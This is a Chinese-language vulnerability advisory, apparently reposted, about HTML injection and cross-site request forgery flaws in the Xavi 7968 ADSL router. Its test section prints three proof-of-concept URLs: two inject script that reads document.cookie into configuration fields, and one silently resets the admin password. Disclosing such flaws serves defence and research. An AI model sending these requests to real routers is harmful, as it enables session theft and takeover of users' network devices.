Xavi 7968 ADSL路由器多个远程安全漏洞

文章由LinuxBoy分享于2019-04-02 08:04:59热评（154）

Xavi 7968 ADSL路由器多个远程安全漏洞

发布日期：2012-02-21
更新日期：2012-02-22

受影响系统：
Xavi 7968 ADSL Router
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 52098

Xavi ADSL Router是一款ADSL路由器。

Xavi 7968 ADSL Router在实现上存在HTML注入和跨站请求伪造漏洞，攻击者可利用此漏洞执行任意脚本代码、窃取Cookie验证凭证或执行某些管理操作。

<*来源：Busindre
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.example.com/webconfig/wan/confirm.html/confirm?context=pageAction%3Dadd%26pvcName%3D%2522%253e%253c%252ftd%253e%253cscript%253ealert%28document.cookie%29%253c%252fscript%253e%26vpi%3D0%26vci%3D38%26scat%3DUBR%26accessmode%3Dpppoe%26encap%3Dvcmux%26encapmode%3Dbridged%26iptype%3Ddhcp%26nat_enable%3Dfalse%26def_route_enable%3Dfalse%26qos_enable%3Dfalse%26chkPPPOEAC%3Dfalse%26tBoxPPPOEAC%3DNot%2520Configured%26sessiontype%3Dalways_on%26username%3Da%26password%3Dss&confirm=+Apply+

http://www.example.com/webconfig/lan/lan_config.html/local_lan_config?ip_add_txtbox=www.example2.com&sub_mask_txtbox=255.255.255.0&host_name_txtbox=Hack<SCRIPT>alert(document.cookie)</script>&domain_name_txtbox=local.lan&mtu_txtbox=1500&next=Apply

http://www.example.com/webconfig/admin_passwd/passwd.html/admin_passwd?sySUSErName=1234&sysPassword=12345&sysCfmPwd=12345&cmdSubmit=Apply

建议：
--------------------------------------------------------------------------------
厂商补丁：

Xavi
----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.xavi.com.tw/

推荐文章：

Xavi 7968 ADSL路由器多个远程安全漏洞